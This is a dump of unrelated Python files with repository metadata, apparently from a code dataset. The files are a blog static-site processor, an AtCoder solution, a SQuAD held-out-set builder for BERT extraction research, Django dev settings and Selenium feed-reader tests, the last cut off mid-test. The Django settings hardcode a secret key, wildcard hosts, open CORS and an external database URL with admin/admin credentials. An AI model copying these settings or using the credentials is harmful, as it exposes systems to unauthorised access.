from nib import Document, Processor, before, document
dateregex = re.compile(r'(?P<year>\d\d\d\d)[-./](?P<month>\d\d)[-./](?P<day>\d\d)')
@before
class BlogDateProcessor(Processor):
def document(self, document):
if 'date' in document:
if document.group is None:
document.group = 'blog'
return document
@document('blog')
class BlogDocumentProcessor(Processor):
def process(self, documents, resources):
archives = self.options['blog']['archive']
uris = self.options['blog']['uris']
templates = self.options['blog']['templates']
blog_pages = {}
def blog_page(name, parent=None, child=None, **kwargs):
path = uris[name].format(**kwargs)
if path not in blog_pages:
page = Document(path=path,
content='',
short='',
template=templates[name],
pages=[],
**kwargs
)
if parent:
parent['pages'].append(page)
blog_pages[path] = page
else:
page = blog_pages[path]
if child:
page['pages'].append(child)
return page
feed_page = blog_page('feed', paginate=False)
index_page = blog_page('index')
archive_page = blog_page('archive', title='Archive', paginate=False)
tags_page = blog_page('tags', title='Tags', paginate=False)
for document in documents:
document['template'] = templates['post']
if type(document['date']) == datetime.date:
date = document['date']
kwargs = {
'date': date,
'year': date.year,
'month': date.month,
'day': date.day,
}
if archives['yearly']:
blog_page('yearly', parent=archive_page, child=document,
title=date.strftime('%Y'), type='year', **kwargs)
if archives['monthly']:
blog_page('monthly', parent=archive_page, child=document,
title=date.strftime('%B %Y'), type='month', **kwargs)
if archives['daily']:
blog_page('daily', parent=archive_page, child=document,
title=date.strftime('%B %d, %Y'), type='day', **kwargs)
if 'tags' in document:
tags = [token.strip() for token in document['tags'].split(',')]
document['tags'] = {}
for tag in tags:
tag_page = blog_page('tag', parent=tags_page, child=document,
title=tag, tag=tag)
document['tags'][tag] = tag_page
feed_page['pages'].append(document)
index_page['pages'].append(document)
documents.extend(blog_pages.values())
return documents, resources
| true | true |
f72601e5fda214f23f81969e4034744eaff7b404 | 188 | py | Python | atcoder/abc178C_ubiquity.py | uninhm/kyopro | bf6ed9cbf6a5e46cde0291f7aa9d91a8ddf1f5a3 | [
"BSD-3-Clause"
] | 31 | 2020-05-13T01:07:55.000Z | 2021-07-13T07:53:26.000Z | atcoder/abc178C_ubiquity.py | uninhm/kyopro | bf6ed9cbf6a5e46cde0291f7aa9d91a8ddf1f5a3 | [
"BSD-3-Clause"
] | 10 | 2020-05-20T07:22:09.000Z | 2021-07-19T03:52:13.000Z | atcoder/abc178C_ubiquity.py | uninhm/kyopro | bf6ed9cbf6a5e46cde0291f7aa9d91a8ddf1f5a3 | [
"BSD-3-Clause"
] | 14 | 2020-05-11T05:58:36.000Z | 2021-12-07T03:20:43.000Z | # Vicfred & uninhm
# https://atcoder.jp/contests/abc178/tasks/abc178_c
# combinatorics
n = int(input())
mod = 10**9+7
print((pow(10, n, mod) - 2*pow(9, n, mod) + pow(8, n, mod)) % mod)
| 18.8 | 66 | 0.62234 |
n = int(input())
mod = 10**9+7
print((pow(10, n, mod) - 2*pow(9, n, mod) + pow(8, n, mod)) % mod)
| true | true |
f726020d71b71fa88e43f762ead78c688e3c3a3a | 3,322 | py | Python | language/bert_extraction/steal_bert_qa/data_generation/preprocess_thief_dev_squad.py | IngrojShrestha/language | 674a3d016b1e17658e301e8d9bdfa63e3d3f5d15 | [
"Apache-2.0"
] | 1 | 2020-05-30T15:19:39.000Z | 2020-05-30T15:19:39.000Z | language/bert_extraction/steal_bert_qa/data_generation/preprocess_thief_dev_squad.py | IngrojShrestha/language | 674a3d016b1e17658e301e8d9bdfa63e3d3f5d15 | [
"Apache-2.0"
] | null | null | null | language/bert_extraction/steal_bert_qa/data_generation/preprocess_thief_dev_squad.py | IngrojShrestha/language | 674a3d016b1e17658e301e8d9bdfa63e3d3f5d15 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Construct a held-out / validation set from a large pool of WIKI / RANDOM queries ensuring there is no overlap with the train set."""
import json
import random
import numpy as np
import tensorflow.compat.v1 as tf
app = tf.compat.v1.app
flags = tf.flags
gfile = tf.gfile
logging = tf.logging
flags.DEFINE_string("pool_dataset", None,
"Large pool of queries having training set distribution.")
flags.DEFINE_string("train_dataset", None,
"Training set of queries used for model extraction.")
flags.DEFINE_integer("dev_dataset_size", 10570,
"Number of QAs in held-out set. (default: SQuAD 1.1 size")
flags.DEFINE_string("output_path", None, "Output path for the held-out set.")
flags.DEFINE_integer("random_seed", 42, "Random seed for determinism.")
FLAGS = flags.FLAGS
def main(_):
random.seed(FLAGS.random_seed)
np.random.seed(FLAGS.random_seed)
with gfile.Open(FLAGS.pool_dataset, "r") as f:
pool_data = json.loads(f.read())["data"]
with gfile.Open(FLAGS.train_dataset, "r") as f:
train_data = json.loads(f.read())["data"]
all_train_paras = {}
for inst in train_data:
for para in inst["paragraphs"]:
all_train_paras[para["context"]] = 1
num_dev_questions = FLAGS.dev_dataset_size
# sanity check to verify all pool dataset question IDs are unique
num_pool_questions = 0
pool_qids = {}
for inst in pool_data:
for para in inst["paragraphs"]:
for qa in para["qas"]:
num_pool_questions += 1
pool_qids[qa["id"]] = 1
assert len(pool_qids) == num_pool_questions
random.shuffle(pool_data)
output_data = {"data": [], "version": FLAGS.version}
for instance in pool_data:
curr_instance = {"title": "Random dev data", "paragraphs": []}
for para in instance["paragraphs"]:
# Even if there is a paragraph overlap, do not consider it for the
# held-out set since we want to minimize overlap
if para["context"] in all_train_paras:
continue
# Assume different paragraphs have different questions
curr_instance["paragraphs"].append(para)
num_dev_questions = num_dev_questions - len(para["qas"])
if num_dev_questions <= 0:
break
if curr_instance["paragraphs"]:
output_data["data"].append(curr_instance)
if num_dev_questions <= 0:
break
total_questions = 0
for instance in output_data["data"]:
for para in instance["paragraphs"]:
for qa in para["qas"]:
total_questions += 1
logging.info("Final dataset size = %d", total_questions)
with gfile.Open(FLAGS.output_path, "w") as f:
f.write(json.dumps(output_data))
if __name__ == "__main__":
app.run(main)
| 31.638095 | 135 | 0.695665 |
import json
import random
import numpy as np
import tensorflow.compat.v1 as tf
app = tf.compat.v1.app
flags = tf.flags
gfile = tf.gfile
logging = tf.logging
flags.DEFINE_string("pool_dataset", None,
"Large pool of queries having training set distribution.")
flags.DEFINE_string("train_dataset", None,
"Training set of queries used for model extraction.")
flags.DEFINE_integer("dev_dataset_size", 10570,
"Number of QAs in held-out set. (default: SQuAD 1.1 size")
flags.DEFINE_string("output_path", None, "Output path for the held-out set.")
flags.DEFINE_integer("random_seed", 42, "Random seed for determinism.")
FLAGS = flags.FLAGS
def main(_):
random.seed(FLAGS.random_seed)
np.random.seed(FLAGS.random_seed)
with gfile.Open(FLAGS.pool_dataset, "r") as f:
pool_data = json.loads(f.read())["data"]
with gfile.Open(FLAGS.train_dataset, "r") as f:
train_data = json.loads(f.read())["data"]
all_train_paras = {}
for inst in train_data:
for para in inst["paragraphs"]:
all_train_paras[para["context"]] = 1
num_dev_questions = FLAGS.dev_dataset_size
num_pool_questions = 0
pool_qids = {}
for inst in pool_data:
for para in inst["paragraphs"]:
for qa in para["qas"]:
num_pool_questions += 1
pool_qids[qa["id"]] = 1
assert len(pool_qids) == num_pool_questions
random.shuffle(pool_data)
output_data = {"data": [], "version": FLAGS.version}
for instance in pool_data:
curr_instance = {"title": "Random dev data", "paragraphs": []}
for para in instance["paragraphs"]:
if para["context"] in all_train_paras:
continue
curr_instance["paragraphs"].append(para)
num_dev_questions = num_dev_questions - len(para["qas"])
if num_dev_questions <= 0:
break
if curr_instance["paragraphs"]:
output_data["data"].append(curr_instance)
if num_dev_questions <= 0:
break
total_questions = 0
for instance in output_data["data"]:
for para in instance["paragraphs"]:
for qa in para["qas"]:
total_questions += 1
logging.info("Final dataset size = %d", total_questions)
with gfile.Open(FLAGS.output_path, "w") as f:
f.write(json.dumps(output_data))
if __name__ == "__main__":
app.run(main)
| true | true |
f72604d331367abace2bd7856e05fc96d5ec665a | 3,831 | py | Python | visualisation_engine/settings/dev.py | QualiChain/visualisation_engine_ | 8ec00aa08d703a9f23462d73236f1e20e9168237 | [
"MIT"
] | null | null | null | visualisation_engine/settings/dev.py | QualiChain/visualisation_engine_ | 8ec00aa08d703a9f23462d73236f1e20e9168237 | [
"MIT"
] | null | null | null | visualisation_engine/settings/dev.py | QualiChain/visualisation_engine_ | 8ec00aa08d703a9f23462d73236f1e20e9168237 | [
"MIT"
] | null | null | null | """
Django settings for visualisation_engine project.
Generated by 'django-admin startproject' using Django 3.1.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
import os
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve(strict=True).parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 's5oyds$!u$m%m#oq6iqr!=sq)$5gt(bo6bnu+2qsg#fcgzfw@b'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
#CORS
CORS_ORIGIN_ALLOW_ALL = True
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
# CORS
'corsheaders',
'django.contrib.staticfiles',
'visualiser',
# 'data_manager'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
#CORS
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'visualisation_engine.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'visualisation_engine.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': BASE_DIR / 'db.sqlite3',
# }
# }
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
STATIC_FINDER = [
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
]
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles/')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, '../static'),
]
TEMPLATE_DIRS = (os.path.join(BASE_DIR, 'templates'),)
# external postgres
ENGINE_STRING = 'postgresql+psycopg2://{}:{}@{}:{}/{}'.format(
'admin',
'admin',
'qualichain.epu.ntua.gr',
5435,
'qualichain_db'
) | 25.039216 | 91 | 0.692247 |
from pathlib import Path
import os
BASE_DIR = Path(__file__).resolve(strict=True).parent.parent
SECRET_KEY = 's5oyds$!u$m%m#oq6iqr!=sq)$5gt(bo6bnu+2qsg#fcgzfw@b'
DEBUG = True
ALLOWED_HOSTS = ['*']
#CORS
CORS_ORIGIN_ALLOW_ALL = True
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
# CORS
'corsheaders',
'django.contrib.staticfiles',
'visualiser',
# 'data_manager'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
#CORS
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'visualisation_engine.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'visualisation_engine.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': BASE_DIR / 'db.sqlite3',
# }
# }
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
STATIC_FINDER = [
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
]
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles/')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, '../static'),
]
TEMPLATE_DIRS = (os.path.join(BASE_DIR, 'templates'),)
# external postgres
ENGINE_STRING = 'postgresql+psycopg2://{}:{}@{}:{}/{}'.format(
'admin',
'admin',
'qualichain.epu.ntua.gr',
5435,
'qualichain_db'
) | true | true |
f72605046ec8fd6a2d4e80f3aaede195b2b0f3f8 | 233 | py | Python | print_histogram.py | lwoznicki/Python-simple-code | 72486f8f18f8ffc019838be4b1d7d45c68356a0e | [
"MIT"
] | null | null | null | print_histogram.py | lwoznicki/Python-simple-code | 72486f8f18f8ffc019838be4b1d7d45c68356a0e | [
"MIT"
] | null | null | null | print_histogram.py | lwoznicki/Python-simple-code | 72486f8f18f8ffc019838be4b1d7d45c68356a0e | [
"MIT"
] | 1 | 2020-01-04T20:45:26.000Z | 2020-01-04T20:45:26.000Z | def print_histogram(h):
dict = []
dict += sorted(h.keys())
for e in dict:
print(e, h[e])
spaghetti = {'s' : 1, 'p' : 1, 'a' : 1, 'g' : 1, 'h' : 1, 'e' : 1 ,'t' : 2 , 'i' : 1}
print_histogram(spaghetti)
| 25.888889 | 86 | 0.450644 | def print_histogram(h):
dict = []
dict += sorted(h.keys())
for e in dict:
print(e, h[e])
spaghetti = {'s' : 1, 'p' : 1, 'a' : 1, 'g' : 1, 'h' : 1, 'e' : 1 ,'t' : 2 , 'i' : 1}
print_histogram(spaghetti)
| true | true |
f726052b6ebb1901f2bd60dbf982fdea48f38b54 | 12,031 | py | Python | functional_tests/test_views.py | wivn/feed-reader | 1b4524fcdfc79391a5cf982ce9c5681e600f4303 | [
"MIT"
] | null | null | null | functional_tests/test_views.py | wivn/feed-reader | 1b4524fcdfc79391a5cf982ce9c5681e600f4303 | [
"MIT"
] | null | null | null | functional_tests/test_views.py | wivn/feed-reader | 1b4524fcdfc79391a5cf982ce9c5681e600f4303 | [
"MIT"
] | null | null | null | from django.test import LiveServerTestCase
from selenium import webdriver
from selenium.common.exceptions import WebDriverException
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from unittest import mock
import feedparser
import time
import datetime
from django.core.management import call_command
from django.contrib.auth import get_user_model
from feed.models import Entry
User = get_user_model()
class BaseLiveServerTestCase(LiveServerTestCase):
def setUp(self):
self.browser = webdriver.Safari()
self.wait = WebDriverWait(self.browser, MAX_WAIT)
user = User.objects.create_user(username="myself", password="superCoolPassword")
user.save()
self.client.force_login(user)
cookie = self.client.cookies['sessionid']
# NEED TO SETUP COOKIE
self.browser.get(self.live_server_url) #selenium will set cookie domain based on current page domain
self.browser.add_cookie({'name': 'sessionid', 'value': cookie.value, 'secure': False, 'path': '/'})
self.browser.refresh() #need to update page for logged in user
self.browser.get(self.live_server_url)
def tearDown(self):
self.browser.quit()
class FixturesTestCase(LiveServerTestCase):
fixtures = ["data.json"]
def setUp(self):
self.browser = webdriver.Safari()
self.wait = WebDriverWait(self.browser, MAX_WAIT)
user = User.objects.first()
self.client.force_login(user)
cookie = self.client.cookies['sessionid']
# NEED TO SETUP COOKIE
self.browser.get(self.live_server_url) #selenium will set cookie domain based on current page domain
self.browser.add_cookie({'name': 'sessionid', 'value': cookie.value, 'secure': False, 'path': '/'})
self.browser.refresh() #need to update page for logged in user
self.browser.get(self.live_server_url)
def tearDown(self):
self.browser.quit()
# TODO: Replace time.sleeps with waits
MAX_WAIT = 10
test_url = "https://www.example.org/feed.xml"
test_url_base = "https://www.example.org"
recent_date = datetime.datetime.now()
old_date = recent_date - datetime.timedelta(days = 14)
test_page = f"""<feed xmlns="http://www.w3.org/2005/Atom"><generator uri="https://jekyllrb.com/" version="3.8.5">Jekyll</generator><link href="https://www.example.org/feed.xml" rel="self" type="application/atom+xml"/><link href="https://www.example.org/" rel="alternate" type="text/html"/><updated>2020-06-29T16:00:05+00:00</updated><id>https://www.example.org/feed.xml</id><title type="html">Example Feed</title><author><name>Example Writer</name></author><entry><title type="html">Entry 1</title><link href="https://www.example.org/1" rel="alternate" type="text/html" title="Entry 1"/><published>{recent_date}</published><updated>{recent_date}</updated><id>https://www.example.org/1</id><content type="html" xml:base="https://www.example.org/1">hello 1</content><author><name>Example Writer</name></author><summary type="html"/></entry><entry><title type="html">Entry 2</title><link href="https://www.example.org/2" rel="alternate" type="text/html" title="Entry 2"/><published>{old_date}</published><updated>{old_date}</updated><id>https://www.example.org/2</id><content type="html" xml:base="https://www.example.org/2">hello 2</content><author><name>Example Writer</name></author><summary type="html">hello 2</summary></entry></feed>"""
test_feed = feedparser.parse(test_page)
entries = ["Entry 1", "Entry 2"]
test_feed.etag = None
def fake_find_out_type(url):
return (test_url, test_page , test_url)
def fake_feed_parser(a, *args, **kwargs):
return test_feed
@mock.patch('feed.feedTools.find_out_type', side_effect=fake_find_out_type)
@mock.patch('feed.feedTools.feedparser.parse', side_effect=fake_feed_parser)
class FunctionalTest(BaseLiveServerTestCase):
def test_inital(self, func_1, func_2):
# The user will open the web page to the homepage
self.browser.get(self.live_server_url)
# They will see the form to add a new subscription and enter their url
feed_form = self.browser.find_element_by_css_selector("#new_url_to_add")
feed_form.send_keys(test_url)
feed_form.send_keys(Keys.ENTER)
# They will then see their URL appear in the subscriptions
subscriptions = [sub.text for sub in self.wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, ".subscription")))]
self.assertEqual(len(subscriptions), 1)
self.assertIn(test_url_base, subscriptions[0])
# They will see all the entries they expected as well
titles = [entry.text for entry in self.browser.find_elements_by_class_name("entry__title")]
self.assertEqual(entries, titles)
# The user is happy, but they want to catch up on the past seven days. So they go to the latest page.
self.browser.get(self.live_server_url + "/latest")
# They see all the entries they expect there
titles = [entry.text for entry in self.wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, ".entry__title"))) ]
self.assertEqual(len(titles), 1)
self.assertEqual([entries[0]], titles)
@mock.patch('feed.feedTools.find_out_type', side_effect=fake_find_out_type)
@mock.patch('feed.feedTools.feedparser.parse', side_effect=fake_feed_parser)
class CurrentlyReadingPageTest(FixturesTestCase):
def test_can_set_things_to_currently_reading_and_not_currently_reading_on_home_page(self, func_1, func_2):
# The user will open the web page to the homepage
self.browser.get(self.live_server_url)
# The user will mark an item as currently reading
entry_1_title = [entry.text for entry in self.browser.find_elements_by_class_name("entry__title")][0]
entry_1_currently_reading_button = self.browser.find_elements_by_class_name("entry__currently_reading__btn")[0]
entry_1_currently_reading_button.click()
# That item will disappear from the page
entries_titles = [entry.text for entry in self.wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, ".entry__title"))) ]
self.assertNotIn(entry_1_title, entries_titles)
# The user will then go to the current page and see their item
self.browser.get(self.live_server_url + "/current")
entry_1_title = [entry.text for entry in self.wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, ".entry__title")))][0]
entries_titles_from_current_page = [entry.text for entry in self.browser.find_elements_by_class_name("entry__title")]
self.assertIn(entry_1_title, entries_titles_from_current_page)
# The user then decides they want to remove the item from their currently reading list
entry_1_currently_reading_button = self.browser.find_elements_by_class_name("entry__currently_reading__btn")[0]
entry_1_currently_reading_button.click()
# The user no longer sees the item there
entries_titles = self.wait.until(EC.invisibility_of_element_located((By.CSS_SELECTOR, ".entry__title")))
# There will only be 1, so once it's invisible it's all gone so it'll be True
self.assertEqual(True, entries_titles)
# The user visits the homepage and sees it
self.browser.get(self.live_server_url)
entries_titles = [entry.text for entry in self.browser.find_elements_by_class_name("entry__title")]
self.assertIn(entry_1_title, entries_titles)
def test_can_set_things_to_currently_reading_and_not_currently_reading_on_latest_page(self, func_1, func_2):
# ENSURE THEY ARE ALWAYS LATEST
entry = Entry.objects.first()
entry.published = datetime.datetime.now()
entry.save()
# The user will open the web page to the homepage
self.browser.get(self.live_server_url)
# The user will open the web page to the homepage
self.browser.get(self.live_server_url+'/latest/')
self.wait.until(EC.text_to_be_present_in_element((By.CSS_SELECTOR, ".main-title"), "Latest"))
# The user will mark an item as currently reading
entry_1_title = self.wait.until(EC.visibility_of_element_located((By.CSS_SELECTOR, ".entry__title")))
entry_1_title = entry_1_title.text
entry_1_currently_reading_button = self.wait.until(EC.visibility_of_element_located((By.CSS_SELECTOR, ".entry__currently_reading__btn")))
entry_1_currently_reading_button.click()
# That item will disappear from the page
is_entry_gone = self.wait.until(EC.invisibility_of_element_located((By.CSS_SELECTOR, ".entry__title")))
self.assertEqual(is_entry_gone, True)
# The user will then go to the current page and see their item
self.browser.get(self.live_server_url + "/current")
entry_1_title = [entry.text for entry in self.wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, ".entry__title"))) ][0]
entries_titles_from_current_page = [entry.text for entry in self.browser.find_elements_by_class_name("entry__title")]
self.assertIn(entry_1_title, entries_titles_from_current_page)
# The user then decides they want to remove the item from their currently reading list
entry_1_currently_reading_button = self.browser.find_elements_by_class_name("entry__currently_reading__btn")[0]
entry_1_currently_reading_button.click()
# The user no longer sees the item there
entries_titles = self.wait.until(EC.invisibility_of_element_located((By.CSS_SELECTOR, ".entry__title")))
# if True then it's invisible
self.assertEqual(True, entries_titles)
# The user visits the current page and sees it
self.browser.get(self.live_server_url +'/latest')
entries_titles = [entry.text for entry in self.browser.find_elements_by_class_name("entry__title")]
self.assertIn(entry_1_title, entries_titles)
def test_can_mark_items_as_read_and_unread(self, func_1, func_2):
# The user will open the web page to the homepage
self.browser.get(self.live_server_url)
# The user will mark an item as unread
entry_1_mark_reading_btn = self.browser.find_elements_by_class_name("entry__seen-unseen__btn")[0]
entry_1_mark_reading_btn.click()
# That item will be seen as read on the page
entry_1_mark_reading_btn = self.wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, ".entry__seen-unseen__btn")))[0]
self.assertNotIn("entry__seen-unseen__btn--unread", entry_1_mark_reading_btn.get_attribute("class"))
entry_1_mark_reading_btn.click()
# That user decides to remark it as unread on the page
entry_1_mark_reading_btn = self.wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, ".entry__seen-unseen__btn")))[0]
self.assertIn("entry__seen-unseen__btn--unread", entry_1_mark_reading_btn.get_attribute("class"))
def test_can_delete_subscription(self, func_1, func_2):
# The user will open the web page to the homepage
self.browser.get(self.live_server_url)
# They will then see their one subscription
subscriptions = [sub.text for sub in self.browser.find_elements_by_class_name("subscription")]
self.assertEqual(len(subscriptions), 1)
# They will delete their subscription
subscription_delete_btn = self.browser.find_element_by_class_name("subscription__delete")
subscription_delete_btn.click()
# The subscription will be gone
self.assertEqual(True, self.wait.until(EC.invisibility_of_element_located((By.CSS_SELECTOR, ".subscription"))))
# The entries also will be gone, as there was just one subscription
self.assertEqual([], self.browser.find_elements_by_class_name("entry__title")) | 66.104396 | 1,239 | 0.730114 | from django.test import LiveServerTestCase
from selenium import webdriver
from selenium.common.exceptions import WebDriverException
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from unittest import mock
import feedparser
import time
import datetime
from django.core.management import call_command
from django.contrib.auth import get_user_model
from feed.models import Entry
User = get_user_model()
class BaseLiveServerTestCase(LiveServerTestCase):
def setUp(self):
self.browser = webdriver.Safari()
self.wait = WebDriverWait(self.browser, MAX_WAIT)
user = User.objects.create_user(username="myself", password="superCoolPassword")
user.save()
self.client.force_login(user)
cookie = self.client.cookies['sessionid']
self.browser.get(self.live_server_url)
self.browser.add_cookie({'name': 'sessionid', 'value': cookie.value, 'secure': False, 'path': '/'})
self.browser.refresh()
self.browser.get(self.live_server_url)
def tearDown(self):
self.browser.quit()
class FixturesTestCase(LiveServerTestCase):
fixtures = ["data.json"]
def setUp(self):
self.browser = webdriver.Safari()
self.wait = WebDriverWait(self.browser, MAX_WAIT)
user = User.objects.first()
self.client.force_login(user)
cookie = self.client.cookies['sessionid']
self.browser.get(self.live_server_url)
self.browser.add_cookie({'name': 'sessionid', 'value': cookie.value, 'secure': False, 'path': '/'})
self.browser.refresh()
self.browser.get(self.live_server_url)
def tearDown(self):
self.browser.quit()
MAX_WAIT = 10
test_url = "https://www.example.org/feed.xml"
test_url_base = "https://www.example.org"
recent_date = datetime.datetime.now()
old_date = recent_date - datetime.timedelta(days = 14)
test_page = f"""<feed xmlns="http://www.w3.org/2005/Atom"><generator uri="https://jekyllrb.com/" version="3.8.5">Jekyll</generator><link href="https://www.example.org/feed.xml" rel="self" type="application/atom+xml"/><link href="https://www.example.org/" rel="alternate" type="text/html"/><updated>2020-06-29T16:00:05+00:00</updated><id>https://www.example.org/feed.xml</id><title type="html">Example Feed</title><author><name>Example Writer</name></author><entry><title type="html">Entry 1</title><link href="https://www.example.org/1" rel="alternate" type="text/html" title="Entry 1"/><published>{recent_date}</published><updated>{recent_date}</updated><id>https://www.example.org/1</id><content type="html" xml:base="https://www.example.org/1">hello 1</content><author><name>Example Writer</name></author><summary type="html"/></entry><entry><title type="html">Entry 2</title><link href="https://www.example.org/2" rel="alternate" type="text/html" title="Entry 2"/><published>{old_date}</published><updated>{old_date}</updated><id>https://www.example.org/2</id><content type="html" xml:base="https://www.example.org/2">hello 2</content><author><name>Example Writer</name></author><summary type="html">hello 2</summary></entry></feed>"""
test_feed = feedparser.parse(test_page)
entries = ["Entry 1", "Entry 2"]
test_feed.etag = None
def fake_find_out_type(url):
return (test_url, test_page , test_url)
def fake_feed_parser(a, *args, **kwargs):
return test_feed
@mock.patch('feed.feedTools.find_out_type', side_effect=fake_find_out_type)
@mock.patch('feed.feedTools.feedparser.parse', side_effect=fake_feed_parser)
class FunctionalTest(BaseLiveServerTestCase):
def test_inital(self, func_1, func_2):
self.browser.get(self.live_server_url)
feed_form = self.browser.find_element_by_css_selector("#new_url_to_add")
feed_form.send_keys(test_url)
feed_form.send_keys(Keys.ENTER)
subscriptions = [sub.text for sub in self.wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, ".subscription")))]
self.assertEqual(len(subscriptions), 1)
self.assertIn(test_url_base, subscriptions[0])
titles = [entry.text for entry in self.browser.find_elements_by_class_name("entry__title")]
self.assertEqual(entries, titles)
self.browser.get(self.live_server_url + "/latest")
titles = [entry.text for entry in self.wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, ".entry__title"))) ]
self.assertEqual(len(titles), 1)
self.assertEqual([entries[0]], titles)
@mock.patch('feed.feedTools.find_out_type', side_effect=fake_find_out_type)
@mock.patch('feed.feedTools.feedparser.parse', side_effect=fake_feed_parser)
class CurrentlyReadingPageTest(FixturesTestCase):
def test_can_set_things_to_currently_reading_and_not_currently_reading_on_home_page(self, func_1, func_2):
self.browser.get(self.live_server_url)
entry_1_title = [entry.text for entry in self.browser.find_elements_by_class_name("entry__title")][0]
entry_1_currently_reading_button = self.browser.find_elements_by_class_name("entry__currently_reading__btn")[0]
entry_1_currently_reading_button.click()
entries_titles = [entry.text for entry in self.wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, ".entry__title"))) ]
self.assertNotIn(entry_1_title, entries_titles)
